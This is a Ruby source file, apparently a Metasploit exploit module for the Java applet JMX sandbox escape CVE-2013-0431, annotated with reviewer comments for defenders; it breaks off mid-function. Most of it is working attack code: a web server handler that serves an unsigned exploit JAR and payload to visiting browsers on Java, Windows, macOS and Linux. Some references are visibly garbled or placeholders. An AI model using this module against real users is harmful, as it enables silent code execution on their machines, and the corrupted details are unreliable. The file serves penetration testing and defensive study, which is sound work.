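##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
##

require 'msf/core'
require 'rex' # NOTE(review): the listing read 'recore', which looks like a garbled 'rex' -- confirm

# HTTP-server module for the Java applet JMX sandbox escape tracked as
# CVE-2013-0431 (the identifier used by the data directory and the last
# reference URL below).
#
# Reviewer notes for defenders, grounded in the code in this file:
# * on_request_uri answers three request shapes: a path ending in ".jar"
#   (matched case-insensitively) gets the archive as
#   application/octet-stream, a path ending in "/" gets an HTML page, and
#   anything else is redirected to the resource root.
# * The archive always carries the entries Exploit.ser, Exploit.class and
#   B.class next to the generated payload.
# * Per the module description, the applet is unsigned and no warning is
#   shown to the user, so prompt-based controls are not a safeguard here;
#   removing or patching the affected Java browser plug-in is.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({ :javascript => false })

  # Registers the module metadata: description, credits, references,
  # payload constraints and the four selectable targets.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Java Applet JMX Remote Code Execution',
      'Description'    => %q{
          This module abuses the JMX classes from a Java Applet to run arbitrary Java code
        outside of the sandbox as exploited in the wild in February of 2013. Additionally,
        this module bypasses default security settings introduced in Java 7 Update 10 to run
        unsigned applet without displaying any warning to the user.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',           # Vulnerability discovery and exploit in the wild
          'Adam Gowdiak',      # Vulnerability discovery
          'SecurityObscurity', # Exploit analysis and deobfuscation
          'juan vazquez'       # Metasploit module
        ],
      'References'     =>
        [
          # The listing showed ['cve', '2017-2013'], which is not a valid
          # CVE id; 2013-0431 is the id used by this file's data path and
          # by the last URL below.
          [ 'CVE', '2013-0431' ],
          # NOTE(review): '123' looks like a placeholder for both of the
          # next two entries -- replace with the real ids before relying
          # on them for lookups.
          [ 'OSVDB', '123' ],
          [ 'BID', '123' ],
          [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-8.pdf' ],
          [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-9.pdf' ],
          [ 'URL', 'http://security-obscurity.blogspot.com.es/2013/01/about-new-java-0-day-vulnerability.html' ],
          [ 'URL', 'http://pastebin.com/QWU1rqjf' ],
          [ 'URL', 'http://malware.dontneedcoffee.com/2013/02/cve-2013-0431-java-17-update-11.html' ]
        ],
      'Platform'       => [ 'java', 'win', 'osx', 'linux' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => ['java'],
              'Arch' => ARCH_JAVA,
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Mac OS X x86 (Native Payload)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Linux x86 (Native Payload)',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86,
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jan 19 2013'
    ))
  end

  # Dispatches one incoming HTTP request by the shape of its URI.
  #
  # cli     - connection handle, passed through to the send_* helpers.
  # request - the request object; only request.uri is read here.
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      print_status("Sending JAR")
      send_response(cli, generate_jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      print_status("Sending HTML")
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      # Anything else is bounced to the resource root, which then matches
      # the HTML branch above.
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  # Builds the archive served for ".jar" requests and returns it packed.
  #
  # The entry names come from the literal list below, never from the
  # request, so the File.join further down is not fed client input.
  # `cli` is not a parameter of this method; presumably it is an accessor
  # supplied by the HttpServer mixin -- confirm against the mixin.
  def generate_jar
    paths = [
      [ "Exploit.ser" ],
      [ "Exploit.class" ],
      [ "B.class" ]
    ]

    p = regenerate_payload(cli)

    jar = p.encoded_jar
    paths.each do |path|
      # Adds an empty entry for each parent directory of a nested path.
      # Every path above has a single component, so this loop does not run
      # for the current list.
      1.upto(path.length - 1) do |idx|
        full = path[0, idx].join("/") + "/"
        unless jar.entries.map { |e| e.name }.include?(full)
          jar.add_file(full, '')
        end
      end

      source = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0431", path)
      # Block form closes the handle even when the read raises; the
      # original open/read/close sequence leaked it on error.
      data = File.open(source, "rb") { |fd| fd.read }
      jar.add_file(path.join("/"), data)
    end

    return jar.pack
  end

  def generate_html
    html = <<-EOF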